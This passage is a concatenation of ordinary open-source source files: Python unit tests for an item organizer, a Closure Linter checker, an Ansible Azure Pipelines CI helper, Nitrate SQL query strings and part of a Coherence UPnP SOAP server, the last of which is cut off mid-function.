actions2 = ['action 3', 'action 4']
item1 = Item(title1, {Elem.ACTIONS : actions1})
item2 = Item(title2, {Elem.ACTIONS : actions2})
orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
orgm.add_item(item1)
orgm.add_item(item2)
expected = ['action 1', 'action 2', 'action 3', 'action 4']
actual = orgm.get_elements(Elem.ACTIONS)
# Have to handle the fact that init of test dat file includes dummy item with empty name
self.assertTrue(expected == actual)
def test_get_grouped_items_project(self):
self._init_test_data_file()
title1 = 'title 1'
title2 = 'title 2'
title3 = 'title 3'
title4 = 'title 4'
project1 = 'project 1'
project2 = 'project 2'
item1 = Item(title1, {Elem.PROJECT : project1})
item2 = Item(title2, {Elem.PROJECT : project2})
item3 = Item(title3, {Elem.PROJECT : project1})
item4 = Item(title4, {Elem.PROJECT : project2})
orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
orgm.add_item(item1)
orgm.add_item(item2)
orgm.add_item(item3)
orgm.add_item(item4)
expected1 = repr([{'item' : [{'title': 'title 1'}, {'area': "''"}, {'project': 'project 1'}, {'tags': []}, {'actions': []}, {'priority': "''"}, {'due_date': "''"}, {'note': ''}]}, {'item' : [{'title': 'title 3'}, {'area': "''"}, {'project': 'project 1'}, {'tags': []}, {'actions': []}, {'priority': "''"}, {'due_date': "''"}, {'note': ''}]}])
expected2 = repr([{'item' : [{'title': 'title 2'}, {'area': "''"}, {'project': 'project 2'}, {'tags': []}, {'actions': []}, {'priority': "''"}, {'due_date': "''"}, {'note': ''}]}, {'item' : [{'title': 'title 4'}, {'area': "''"}, {'project': 'project 2'}, {'tags': []}, {'actions': []}, {'priority': "''"}, {'due_date': "''"}, {'note': ''}]}])
actual = orgm.get_grouped_items(Elem.PROJECT)
actual1 = repr(actual[project1])
actual2 = repr(actual[project2])
self.assertTrue(expected1 == actual1)
self.assertTrue(expected2 == actual2)
def test_get_grouped_items_area(self):
self._init_test_data_file()
title1 = 'title 1'
title2 = 'title 2'
title3 = 'title 3'
title4 = 'title 4'
area1 = 'area 1'
area2 = 'area 2'
item1 = Item(title1, {Elem.AREA : area1})
item2 = Item(title2, {Elem.AREA : area2})
item3 = Item(title3, {Elem.AREA : area1})
item4 = Item(title4, {Elem.AREA : area2})
orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
orgm.add_item(item1)
orgm.add_item(item2)
orgm.add_item(item3)
orgm.add_item(item4)
expected1 = repr([{'item' : [{'title': 'title 1'}, {'area': 'area 1'}, {'project': "''"}, {'tags': []}, {'actions': []}, {'priority': "''"}, {'due_date': "''"}, {'note': ''}]}, {'item' : [{'title': 'title 3'}, {'area': 'area 1'}, {'project': "''"}, {'tags': []}, {'actions': []}, {'priority': "''"}, {'due_date': "''"}, {'note': ''}]}])
expected2 = repr([{'item' : [{'title': 'title 2'}, {'area': 'area 2'}, {'project': "''"}, {'tags': []}, {'actions': []}, {'priority': "''"}, {'due_date': "''"}, {'note': ''}]}, {'item' : [{'title': 'title 4'}, {'area': 'area 2'}, {'project': "''"}, {'tags': []}, {'actions': []}, {'priority': "''"}, {'due_date': "''"}, {'note': ''}]}])
actual = orgm.get_grouped_items(Elem.AREA)
actual1 = repr(actual[area1])
actual2 = repr(actual[area2])
self.assertTrue(expected1 == actual1)
self.assertTrue(expected2 == actual2)
def test_get_grouped_items_tags(self):
self._init_test_data_file()
title1 = 'title 1'
title2 = 'title 2'
title3 = 'title 3'
title4 = 'title 4'
tag1 = 'tag 1'
tag2 = 'tag 2'
tag3 = 'tag 3'
tag4 = 'tag 4'
tags1 = [tag1, tag2]
tags2 = [tag3, tag4]
item1 = Item(title1, {Elem.TAGS : tags1})
item2 = Item(title2, {Elem.TAGS : tags2})
item3 = Item(title3, {Elem.TAGS : tags1})
item4 = Item(title4, {Elem.TAGS : tags2})
orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
orgm.add_item(item1)
orgm.add_item(item2)
orgm.add_item(item3)
orgm.add_item(item4)
expected1 = repr([{'item' : [{'title': 'title 1'}, {'area': "''"}, {'project': "''"}, {'tags': [tag1, tag2]}, {'actions': []}, {'priority': "''"}, {'due_date': "''"}, {'note': ''}]}, \
{'item' : [{'title': 'title 3'}, {'area': "''"}, {'project': "''"}, {'tags': [tag1, tag2]}, {'actions': []}, {'priority': "''"}, {'due_date': "''"}, {'note': ''}]}])
expected2 = repr([{'item' : [{'title': 'title 1'}, {'area': "''"}, {'project': "''"}, {'tags': [tag1, tag2]}, {'actions': []}, {'priority': "''"}, {'due_date': "''"}, {'note': ''}]}, \
{'item' : [{'title': 'title 3'}, {'area': "''"}, {'project': "''"}, {'tags': [tag1, tag2]}, {'actions': []}, {'priority': "''"}, {'due_date': "''"}, {'note': ''}]}])
expected3 = repr([{'item' : [{'title': 'title 2'}, {'area': "''"}, {'project': "''"}, {'tags': [tag3, tag4]}, {'actions': []}, {'priority': "''"}, {'due_date': "''"}, {'note': ''}]}, \
{'item' : [{'title': 'title 4'}, {'area': "''"}, {'project': "''"}, {'tags': [tag3, tag4]}, {'actions': []}, {'priority': "''"}, {'due_date': "''"}, {'note': ''}]}])
expected4 = repr([{'item' : [{'title': 'title 2'}, {'area': "''"}, {'project': "''"}, {'tags': [tag3, tag4]}, {'actions': []}, {'priority': "''"}, {'due_date': "''"}, {'note': ''}]}, \
{'item' : [{'title': 'title 4'}, {'area': "''"}, {'project': "''"}, {'tags': [tag3, tag4]}, {'actions': []},{'priority': "''"}, {'due_date': "''"}, {'note': ''}]}])
actual = orgm.get_grouped_items(Elem.TAGS)
actual1 = repr(actual[tag1])
actual2 = repr(actual[tag2])
actual3 = repr(actual[tag3])
actual4 = repr(actual[tag4])
self.assertTrue(expected1 == actual1)
self.assertTrue(expected2 == actual2)
self.assertTrue(expected3 == actual3)
self.assertTrue(expected4 == actual4)
def test_regroup_data_file_project(self):
self._init_test_data_file()
title1 = 'title 1'
title2 = 'title 2'
title3 = 'title 3'
title4 = 'title 4'
project1 = 'project 1'
project2 = 'project 2'
item1 = Item(title1, {Elem.PROJECT : project1})
item2 = Item(title2, {Elem.PROJECT : project2})
item3 = Item(title3, {Elem.PROJECT : project1})
item4 = Item(title4, {Elem.PROJECT : project2})
orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
orgm.add_item(item1)
orgm.add_item(item2)
orgm.add_item(item3)
orgm.add_item(item4)
grouped_items = orgm.get_grouped_items(Elem.PROJECT)
new_data_file_str = orgm.regroup_data_file(Elem.PROJECT, ActionArg.ASCENDING, with_group_labels=False)
grouped_items_str = []
for group_key in grouped_items.keys():
for item in grouped_items[group_key]:
grouped_items_str.append(str(item))
grouped_items_str = "\n".join(grouped_items_str)
self.assertTrue(grouped_items_str == new_data_file_str)
def test_regroup_data_file_area(self):
self._init_test_data_file()
title1 = 'title 1'
title2 = 'title 2'
title3 = 'title 3'
title4 = 'title 4'
area1 = 'area 1'
area2 = 'area 2'
item1 = Item(title1, {Elem.AREA : area1})
item2 = Item(title2, {Elem.AREA : area2})
item3 = Item(title3, {Elem.AREA : area1})
item4 = Item(title4, {Elem.AREA : area2})
orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
orgm.add_item(item1)
orgm.add_item(item2)
orgm.add_item(item3)
orgm.add_item(item4)
grouped_items = orgm.get_grouped_items(Elem.AREA)
new_data_file_str = orgm.regroup_data_file(Elem.AREA, ActionArg.ASCENDING, with_group_labels=False)
grouped_items_str = []
for group_key in grouped_items.keys():
for item in grouped_items[group_key]:
grouped_items_str.append(str(item))
grouped_items_str = "\n".join(grouped_items_str)
self.assertTrue(grouped_items_str == new_data_file_str)
def test_regroup_data_file_area_sort_desc(self):
self._init_test_data_file()
title1 = 'title 1'
title2 = 'title 2'
title3 = 'title 3'
title4 = 'title 4'
area1 = 'area 1'
area2 = 'area 2'
item1 = Item(title1, {Elem.AREA : area1})
item2 = Item(title2, {Elem.AREA : area2})
item3 = Item(title3, {Elem.AREA : area1})
item4 = Item(title4, {Elem.AREA : area2})
orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
orgm.add_item(item1)
orgm.add_item(item2)
orgm.add_item(item3)
orgm.add_item(item4)
grouped_items = orgm.get_grouped_items(Elem.AREA)
new_data_file_str = orgm.regroup_data_file(Elem.AREA, ActionArg.DESCENDING, with_group_labels=False)
grouped_items_str = []
group_keys = grouped_items.keys()
group_keys.reverse()
for group_key in group_keys:
for item in grouped_items[group_key]:
grouped_items_str.append(str(item))
grouped_items_str = "\n".join(grouped_items_str)
self.assertTrue(grouped_items_str == new_data_file_str)
def test_regroup_data_file_tags(self):
self._init_test_data_file()
title1 = 'title 1'
title2 = 'title 2'
title3 = 'title 3'
title4 = 'title 4'
tag1 = 'tag 1'
tag2 = 'tag 2'
tag3 = 'tag 3'
tag4 = 'tag 4'
tags1 = [tag1, tag2]
tags2 = [tag3, tag4]
item1 = Item(title1, {Elem.TAGS : tags1})
item2 = Item(title2, {Elem.TAGS : tags2})
item3 = Item(title3, {Elem.TAGS : tags1})
item4 = Item(title4, {Elem.TAGS : tags2})
orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
orgm.add_item(item1)
orgm.add_item(item2)
orgm.add_item(item3)
orgm.add_item(item4)
grouped_items = orgm.get_grouped_items(Elem.TAGS)
new_data_file_str = orgm.regroup_data_file(Elem.TAGS, ActionArg.ASCENDING, with_group_labels=False)
grouped_items_str = []
for group_key in grouped_items.keys():
for item in grouped_items[group_key]:
grouped_items_str.append(str(item))
grouped_items_str = "\n".join(grouped_items_str)
self.assertTrue(grouped_items_str == new_data_file_str)
def test_regroup_data_file_tags_sort_desc(self):
self._init_test_data_file()
title1 = 'title 1'
title2 = 'title 2'
title3 = 'title 3'
title4 = 'title 4'
tag1 = 'tag 1'
tag2 = 'tag 2'
tag3 = 'tag 3'
tag4 = 'tag 4'
tags1 = [tag1, tag2]
tags2 = [tag3, tag4]
item1 = Item(title1, {Elem.TAGS : tags1})
item2 = Item(title2, {Elem.TAGS : tags2})
item3 = Item(title3, {Elem.TAGS : tags1})
item4 = Item(title4, {Elem.TAGS : tags2})
orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
orgm.add_item(item1)
orgm.add_item(item2)
orgm.add_item(item3)
orgm.add_item(item4)
grouped_items = orgm.get_grouped_items(Elem.TAGS)
new_data_file_str = orgm.regroup_data_file(Elem.TAGS, ActionArg.DESCENDING, with_group_labels=False)
grouped_items_str = []
group_keys = grouped_items.keys()
group_keys.reverse()
for group_key in group_keys:
for item in grouped_items[group_key]:
grouped_items_str.append(str(item))
grouped_items_str = "\n".join(grouped_items_str)
self.assertTrue(grouped_items_str == new_data_file_str)
def test_backup(self):
self._init_test_data_file()
title1 = 'title 1'
title2 = 'title 2'
title3 = 'title 3'
title4 = 'title 4'
tag1 = 'tag 1'
tag2 = 'tag 2'
tag3 = 'tag 3'
tag4 = 'tag 4'
tags1 = [tag1, tag2]
tags2 = [tag3, tag4]
item1 = Item(title1, {Elem.TAGS : tags1})
item2 = Item(title2, {Elem.TAGS : tags2})
item3 = Item(title3, {Elem.TAGS : tags1})
item4 = Item(title4, {Elem.TAGS : tags2})
orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
orgm.add_item(item1)
orgm.add_item(item2)
orgm.add_item(item3)
orgm.add_item(item4)
bak_data_file = 'orgm_test.dat_bak'
orgm.backup(bak_data_file)
import filecmp
filecmp.cmp(TEST_DATA_FILE, bak_data_file)
# NOTE: This is a maual test, no assert(). User must look at TEST_DATA_FILE
# and confirm there is a new empty item
def test_add_empty(self):
self._init_test_data_file()
orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
orgm.add_empty()
#def test_add_item__find_item_by_title__cli(self):
# self._init_test_data_file()
# orgm = Organizem(TEST_DATA_FILE, IS_UNIT_TESTING)
# title = 'my item title'
# cmd = ['-- add', '--title', title]
# orgm.run_shell_cmd(cmd)
# self.assertTrue(orgm.find_items(Elem.TITLE, title))
if __name__ == '__main__':
unittest.main() |
hujiajie/chromium-crosswalk | refs/heads/master | third_party/closure_linter/closure_linter/checker.py | 109 | #!/usr/bin/env python
#
# Copyright 2007 The Closure Linter Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Core methods for checking JS files for common style guide violations."""
__author__ = ('[email protected] (Robert Walker)',
'[email protected] (Andy Perelson)')
import gflags as flags
from closure_linter import aliaspass
from closure_linter import checkerbase
from closure_linter import closurizednamespacesinfo
from closure_linter import javascriptlintrules
flags.DEFINE_list('closurized_namespaces', '',
'Namespace prefixes, used for testing of'
'goog.provide/require')
flags.DEFINE_list('ignored_extra_namespaces', '',
'Fully qualified namespaces that should be not be reported '
'as extra by the linter.')
class JavaScriptStyleChecker(checkerbase.CheckerBase):
"""Checker that applies JavaScriptLintRules."""
def __init__(self, state_tracker, error_handler):
"""Initialize an JavaScriptStyleChecker object.
Args:
state_tracker: State tracker.
error_handler: Error handler to pass all errors to.
"""
self._namespaces_info = None
self._alias_pass = None
if flags.FLAGS.closurized_namespaces:
self._namespaces_info = (
closurizednamespacesinfo.ClosurizedNamespacesInfo(
flags.FLAGS.closurized_namespaces,
flags.FLAGS.ignored_extra_namespaces))
self._alias_pass = aliaspass.AliasPass(
flags.FLAGS.closurized_namespaces, error_handler)
checkerbase.CheckerBase.__init__(
self,
error_handler=error_handler,
lint_rules=javascriptlintrules.JavaScriptLintRules(
self._namespaces_info),
state_tracker=state_tracker)
def Check(self, start_token, limited_doc_checks=False, is_html=False,
stop_token=None):
"""Checks a token stream for lint warnings/errors.
Adds a separate pass for computing dependency information based on
goog.require and goog.provide statements prior to the main linting pass.
Args:
start_token: The first token in the token stream.
limited_doc_checks: Whether to perform limited checks.
is_html: Whether this token stream is HTML.
stop_token: If given, checks should stop at this token.
"""
self._lint_rules.Initialize(self, limited_doc_checks, is_html)
if self._alias_pass:
self._alias_pass.Process(start_token)
# To maximize the amount of errors that get reported before a parse error
# is displayed, don't run the dependency pass if a parse error exists.
if self._namespaces_info:
self._namespaces_info.Reset()
self._ExecutePass(start_token, self._DependencyPass, stop_token)
self._ExecutePass(start_token, self._LintPass, stop_token)
# If we have a stop_token, we didn't end up reading the whole file and,
# thus, don't call Finalize to do end-of-file checks.
if not stop_token:
self._lint_rules.Finalize(self._state_tracker)
def _DependencyPass(self, token):
"""Processes an individual token for dependency information.
Used to encapsulate the logic needed to process an individual token so that
it can be passed to _ExecutePass.
Args:
token: The token to process.
"""
self._namespaces_info.ProcessToken(token, self._state_tracker)
|
sivel/ansible | refs/heads/devel | test/lib/ansible_test/_internal/ci/azp.py | 14 | """Support code for working with Azure Pipelines."""
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import os
import tempfile
import uuid
from .. import types as t
from ..encoding import (
to_bytes,
)
from ..config import (
CommonConfig,
TestConfig,
)
from ..git import (
Git,
)
from ..http import (
HttpClient,
urlencode,
)
from ..util import (
display,
MissingEnvironmentVariable,
)
from . import (
AuthContext,
ChangeDetectionNotSupported,
CIProvider,
CryptographyAuthHelper,
)
CODE = 'azp'
class AzurePipelines(CIProvider):
"""CI provider implementation for Azure Pipelines."""
def __init__(self):
self.auth = AzurePipelinesAuthHelper()
@staticmethod
def is_supported(): # type: () -> bool
"""Return True if this provider is supported in the current running environment."""
return os.environ.get('SYSTEM_COLLECTIONURI', '').startswith('https://dev.azure.com/')
@property
def code(self): # type: () -> str
"""Return a unique code representing this provider."""
return CODE
@property
def name(self): # type: () -> str
"""Return descriptive name for this provider."""
return 'Azure Pipelines'
def generate_resource_prefix(self): # type: () -> str
"""Return a resource prefix specific to this CI provider."""
try:
prefix = 'azp-%s-%s-%s' % (
os.environ['BUILD_BUILDID'],
os.environ['SYSTEM_JOBATTEMPT'],
os.environ['SYSTEM_JOBIDENTIFIER'],
)
except KeyError as ex:
raise MissingEnvironmentVariable(name=ex.args[0])
return prefix
def get_base_branch(self): # type: () -> str
"""Return the base branch or an empty string."""
base_branch = os.environ.get('SYSTEM_PULLREQUEST_TARGETBRANCH') or os.environ.get('BUILD_SOURCEBRANCHNAME')
if base_branch:
base_branch = 'origin/%s' % base_branch
return base_branch or ''
def detect_changes(self, args): # type: (TestConfig) -> t.Optional[t.List[str]]
"""Initialize change detection."""
result = AzurePipelinesChanges(args)
if result.is_pr:
job_type = 'pull request'
else:
job_type = 'merge commit'
display.info('Processing %s for branch %s commit %s' % (job_type, result.branch, result.commit))
if not args.metadata.changes:
args.metadata.populate_changes(result.diff)
if result.paths is None:
# There are several likely causes of this:
# - First run on a new branch.
# - Too many pull requests passed since the last merge run passed.
display.warning('No successful commit found. All tests will be executed.')
return result.paths
def supports_core_ci_auth(self, context): # type: (AuthContext) -> bool
"""Return True if Ansible Core CI is supported."""
return True
def prepare_core_ci_auth(self, context): # type: (AuthContext) -> t.Dict[str, t.Any]
"""Return authentication details for Ansible Core CI."""
try:
request = dict(
org_name=os.environ['SYSTEM_COLLECTIONURI'].strip('/').split('/')[-1],
project_name=os.environ['SYSTEM_TEAMPROJECT'],
build_id=int(os.environ['BUILD_BUILDID']),
task_id=str(uuid.UUID(os.environ['SYSTEM_TASKINSTANCEID'])),
)
except KeyError as ex:
raise MissingEnvironmentVariable(name=ex.args[0])
self.auth.sign_request(request)
auth = dict(
azp=request,
)
return auth
def get_git_details(self, args): # type: (CommonConfig) -> t.Optional[t.Dict[str, t.Any]]
"""Return details about git in the current environment."""
changes = AzurePipelinesChanges(args)
details = dict(
base_commit=changes.base_commit,
commit=changes.commit,
)
return details
class AzurePipelinesAuthHelper(CryptographyAuthHelper):
"""
Authentication helper for Azure Pipelines.
Based on cryptography since it is provided by the default Azure Pipelines environment.
"""
def publish_public_key(self, public_key_pem): # type: (str) -> None
"""Publish the given public key."""
try:
agent_temp_directory = os.environ['AGENT_TEMPDIRECTORY']
except KeyError as ex:
raise MissingEnvironmentVariable(name=ex.args[0])
# the temporary file cannot be deleted because we do not know when the agent has processed it
# placing the file in the agent's temp directory allows it to be picked up when the job is running in a container
with tempfile.NamedTemporaryFile(prefix='public-key-', suffix='.pem', delete=False, dir=agent_temp_directory) as public_key_file:
public_key_file.write(to_bytes(public_key_pem))
public_key_file.flush()
# make the agent aware of the public key by declaring it as an attachment
vso_add_attachment('ansible-core-ci', 'public-key.pem', public_key_file.name)
class AzurePipelinesChanges:
"""Change information for an Azure Pipelines build."""
def __init__(self, args): # type: (CommonConfig) -> None
self.args = args
self.git = Git()
try:
self.org_uri = os.environ['SYSTEM_COLLECTIONURI'] # ex: https://dev.azure.com/{org}/
self.project = os.environ['SYSTEM_TEAMPROJECT']
self.repo_type = os.environ['BUILD_REPOSITORY_PROVIDER'] # ex: GitHub
self.source_branch = os.environ['BUILD_SOURCEBRANCH']
self.source_branch_name = os.environ['BUILD_SOURCEBRANCHNAME']
self.pr_branch_name = os.environ.get('SYSTEM_PULLREQUEST_TARGETBRANCH')
except KeyError as ex:
raise MissingEnvironmentVariable(name=ex.args[0])
if self.source_branch.startswith('refs/tags/'):
raise ChangeDetectionNotSupported('Change detection is not supported for tags.')
self.org = self.org_uri.strip('/').split('/')[-1]
self.is_pr = self.pr_branch_name is not None
if self.is_pr:
# HEAD is a merge commit of the PR branch into the target branch
# HEAD^1 is HEAD of the target branch (first parent of merge commit)
# HEAD^2 is HEAD of the PR branch (second parent of merge commit)
# see: https://git-scm.com/docs/gitrevisions
self.branch = self.pr_branch_name
self.base_commit = 'HEAD^1'
self.commit = 'HEAD^2'
else:
commits = self.get_successful_merge_run_commits()
self.branch = self.source_branch_name
self.base_commit = self.get_last_successful_commit(commits)
self.commit = 'HEAD'
self.commit = self.git.run_git(['rev-parse', self.commit]).strip()
if self.base_commit:
self.base_commit = self.git.run_git(['rev-parse', self.base_commit]).strip()
# <commit>...<commit>
# This form is to view the changes on the branch containing and up to the second <commit>, starting at a common ancestor of both <commit>.
# see: https://git-scm.com/docs/git-diff
dot_range = '%s...%s' % (self.base_commit, self.commit)
self.paths = sorted(self.git.get_diff_names([dot_range]))
self.diff = self.git.get_diff([dot_range])
else:
self.paths = None # act as though change detection not enabled, do not filter targets
self.diff = []
def get_successful_merge_run_commits(self): # type: () -> t.Set[str]
"""Return a set of recent successsful merge commits from Azure Pipelines."""
parameters = dict(
maxBuildsPerDefinition=100, # max 5000
queryOrder='queueTimeDescending', # assumes under normal circumstances that later queued jobs are for later commits
resultFilter='succeeded',
reasonFilter='batchedCI', # may miss some non-PR reasons, the alternative is to filter the list after receiving it
repositoryType=self.repo_type,
repositoryId='%s/%s' % (self.org, self.project),
)
url = '%s%s/_apis/build/builds?api-version=6.0&%s' % (self.org_uri, self.project, urlencode(parameters))
http = HttpClient(self.args, always=True)
response = http.get(url)
# noinspection PyBroadException
try:
result = response.json()
except Exception: # pylint: disable=broad-except
# most likely due to a private project, which returns an HTTP 203 response with HTML
display.warning('Unable to find project. Cannot determine changes. All tests will be executed.')
return set()
commits = set(build['sourceVersion'] for build in result['value'])
return commits
def get_last_successful_commit(self, commits): # type: (t.Set[str]) -> t.Optional[str]
"""Return the last successful commit from git history that is found in the given commit list, or None."""
commit_history = self.git.get_rev_list(max_count=100)
ordered_successful_commits = [commit for commit in commit_history if commit in commits]
last_successful_commit = ordered_successful_commits[0] if ordered_successful_commits else None
return last_successful_commit
def vso_add_attachment(file_type, file_name, path): # type: (str, str, str) -> None
"""Upload and attach a file to the current timeline record."""
vso('task.addattachment', dict(type=file_type, name=file_name), path)
def vso(name, data, message): # type: (str, t.Dict[str, str], str) -> None
"""
Write a logging command for the Azure Pipelines agent to process.
See: https://docs.microsoft.com/en-us/azure/devops/pipelines/scripts/logging-commands?view=azure-devops&tabs=bash
"""
display.info('##vso[%s %s]%s' % (name, ';'.join('='.join((key, value)) for key, value in data.items()), message))
|
ShaolongHu/Nitrate | refs/heads/develop | tcms/testcases/sqls.py | 1 | REMOVE_COMPONENT = '''
DELETE FROM test_case_components WHERE case_id = %s AND component_id = %s
'''
REMOVE_PLAN = '''
DELETE FROM test_case_plans WHERE plan_id = %s AND case_id = %s
'''
REMOVE_TAG = '''
DELETE FROM test_case_tags WHERE case_id = %s AND tag_id = %s
'''
REMOVE_BUG = '''
DELETE FROM test_case_bugs WHERE bug_id = %s AND case_id = %s AND case_run_id IS NULL
'''
REMOVE_BUG_WITH_RUN_ID = '''
DELETE FROM test_case_bugs WHERE bug_id = %s AND case_id = %s AND case_run_id = %s
'''
TC_PRINTABLE_CASE_TEXTS = '''
SELECT t1.case_id,
t1.summary,
t2.setup,
t2.action,
t2.effect,
t2.breakdown
FROM test_cases t1
INNER JOIN test_case_texts t2
ON ( t1.case_id = t2.case_id )
INNER JOIN (SELECT t4.case_id,
Max(t4.case_text_version) AS max_version
FROM test_case_texts t4
WHERE t4.case_id IN ( %s )
GROUP BY t4.case_id) t3
ON ( t2.case_id = t3.case_id
AND t2.case_text_version = t3.max_version )
WHERE t2.case_id IN ( %s )
'''
TC_EXPORT_ALL_CASES_META = '''
SELECT `test_cases`.`case_id`,
`test_cases`.`summary`,
`test_cases`.`isautomated`,
`test_cases`.`notes`,
`priority`.`value` AS priority,
`test_case_status`.`name` AS case_status,
author.email AS auther_email,
tester.email AS tester_email,
`test_case_categories`.`name` AS category_name
FROM `test_cases`
INNER JOIN `test_case_status` ON (`test_cases`.`case_status_id` = `test_case_status`.`case_status_id`)
INNER JOIN `priority` ON (`priority`.`id` = `test_cases`.`priority_id`)
LEFT JOIN `auth_user` AS author ON (author.id = `test_cases`.`author_id`)
LEFT JOIN `auth_user` AS tester ON (tester.id = `test_cases`.`default_tester_id`)
LEFT JOIN `test_case_categories` ON (`test_case_categories`.`category_id` =
`test_cases`.`category_id`)
WHERE (`test_cases`.`case_id` IN (%s)
AND `test_case_status`.`case_status_id` IN (1,2,4));
'''
TC_EXPORT_ALL_CASES_COMPONENTS = '''
SELECT `test_case_components`.`case_id`,
`components`.`id` as component_id,
`components`.`name` as component_name,
`products`.`name` as product_name
FROM `components`
INNER JOIN `test_case_components` ON (`components`.`id` = `test_case_components`.`component_id`)
INNER JOIN `products` ON (`products`.`id` = `components`.`product_id`)
WHERE `test_case_components`.`case_id` IN (%s)
'''
TC_EXPORT_ALL_CASE_TAGS = '''
SELECT test_cases.case_id,
test_tags.tag_name
FROM test_cases
INNER JOIN test_case_tags ON (test_case_tags.case_id = test_cases.case_id)
INNER JOIN test_tags ON (test_tags.tag_id = test_case_tags.tag_id)
WHERE test_cases.case_id IN (%s)
'''
TC_EXPORT_ALL_CASE_TEXTS = '''
SELECT t1.case_id,
t2.setup,
t2.action,
t2.effect,
t2.breakdown
FROM test_cases t1
INNER JOIN test_case_texts t2
ON ( t1.case_id = t2.case_id )
INNER JOIN (SELECT t4.case_id,
Max(t4.case_text_version) AS max_version
FROM test_case_texts t4
WHERE t4.case_id IN ( %s )
GROUP BY t4.case_id) t3
ON ( t2.case_id = t3.case_id
AND t2.case_text_version = t3.max_version )
WHERE t2.case_id IN ( %s )
'''
GET_TAGS_FROM_CASES_FROM_PLAN = '''
SELECT DISTINCT test_tags.tag_id, test_tags.tag_name
FROM test_tags
INNER JOIN test_case_tags ON (test_tags.tag_id = test_case_tags.tag_id)
INNER JOIN test_cases ON (test_case_tags.case_id = test_cases.case_id)
INNER JOIN test_case_plans ON (test_cases.case_id = test_case_plans.case_id)
WHERE test_cases.case_id IN ({0}) AND test_case_plans.plan_id = %s
'''
GET_TAGS_FROM_CASES = '''
SELECT DISTINCT test_tags.tag_id, test_tags.tag_name
FROM test_tags
INNER JOIN test_case_tags ON (test_tags.tag_id = test_case_tags.tag_id)
INNER JOIN test_cases ON (test_case_tags.case_id = test_cases.case_id)
WHERE test_cases.case_id IN ({0})
'''
|
furbrain/Coherence | refs/heads/maintain/0.6.x | coherence/upnp/core/soap_service.py | 2 | # Licensed under the MIT license
# http://opensource.org/licenses/mit-license.php
# Copyright 2007 - Frank Scholz <[email protected]>
from twisted.web import server, resource
from twisted.python import failure
from twisted.internet import defer
from coherence import log, SERVER_ID
from coherence.extern.et import ET, namespace_map_update
from coherence.upnp.core.utils import parse_xml
from coherence.upnp.core import soap_lite
import coherence.extern.louie as louie
class errorCode(Exception):
def __init__(self, status):
Exception.__init__(self)
self.status = status
class UPnPPublisher(resource.Resource, log.Loggable):
""" Based upon twisted.web.soap.SOAPPublisher and
extracted to remove the SOAPpy dependency
UPnP requires headers and OUT parameters to be returned
in a slightly
different way than the SOAPPublisher class does.
"""
logCategory = 'soap'
isLeaf = 1
encoding = "UTF-8"
envelope_attrib = None
def _sendResponse(self, request, response, status=200):
self.debug('_sendResponse %s %s', status, response)
if status == 200:
request.setResponseCode(200)
else:
request.setResponseCode(500)
if self.encoding is not None:
mimeType = 'text/xml; charset="%s"' % self.encoding
else:
mimeType = "text/xml"
request.setHeader("Content-type", mimeType)
request.setHeader("Content-length", str(len(response)))
request.setHeader("EXT", '')
request.setHeader("SERVER", SERVER_ID)
request.write(response)
request.finish()
def _methodNotFound(self, request, methodName):
response = soap_lite.build_soap_error(401)
self._sendResponse(request, response, status=401)
def _gotResult(self, result, request, methodName, ns):
self.debug('_gotResult %s %s %s %s', result, request, methodName, ns)
response = soap_lite.build_soap_call("{%s}%s" % (ns, methodName), result,
is_response=True,
encoding=None)
#print "SOAP-lite response", response
self._sendResponse(request, response)
def _gotError(self, failure, request, methodName, ns):
self.info('_gotError %s %s', failure, failure.value)
e = failure.value
status = 500
if isinstance(e, errorCode):
status = e.status
else:
failure.printTraceback()
response = soap_lite.build_soap_error(status)
self._sendResponse(request, response, status=status)
def lookupFunction(self, functionName):
function = getattr(self, "soap_%s" % functionName, None)
if not function:
function = getattr(self, "soap__generic", None)
if function:
return function, getattr(function, "useKeywords", False)
else:
return None, None
def render(self, request):
"""Handle a SOAP command."""
data = request.content.read()
headers = request.getAllHeaders()
self.info('soap_request: %s', headers)
# allow external check of data
louie.send('UPnPTest.Control.Client.CommandReceived', None, headers, data)
def print_c(e):
for c in e.getchildren():
print c, c.tag
print_c(c)
tree = parse_xml(data)
#root = tree.getroot()
#print_c(root)
body = tree.find('{http://schemas.xmlsoap.org/soap/envelope/}Body')
method = body.getchildren()[0]
methodName = method.tag
ns = None
if methodName.startswith('{') and methodName.rfind('}') > 1:
ns, methodName = methodName[1:].split('}')
args = []
kwargs = {}
for child in method.getchildren():
kwargs[child.tag] = self.decode_result(child)
args.append(kwargs[child.tag])
#p, header, body, attrs = SOAPpy.parseSOAPRPC(data, 1, 1, 1)
#methodName, args, kwargs, ns = p._name, p._aslist, p._asdict, p._ns
try:
headers['content-type'].index('text/xml')
except:
self._gotError(failure.Failure(errorCode(415)), request, methodName)
return server.NOT_DONE_YET
self.debug('headers: %r', headers)
function, useKeywords = self.lookupFunction(methodName)
#print 'function', function, 'keywords', useKeywords, 'args', args, 'kwargs', kwargs
if not function:
self._methodNotFound(request, methodName)
return server.NOT_DONE_YET
else:
keywords = {'soap_methodName': methodName}
if(headers.has_key('user-agent') and
headers['user-agent'].find('Xbox/') == 0):
keywords['X_UPnPClient'] = 'XBox'
#if(headers.has_key('user-agent') and
# headers['user-agent'].startswith("""Mozilla/4.0 (compatible; UPnP/1.0; Windows""")):
# keywords['X_UPnPClient'] = 'XBox'
if(headers.has_key('x-av-client-info') and
headers['x-av-client-info'].find('"PLAYSTATION3') > 0):
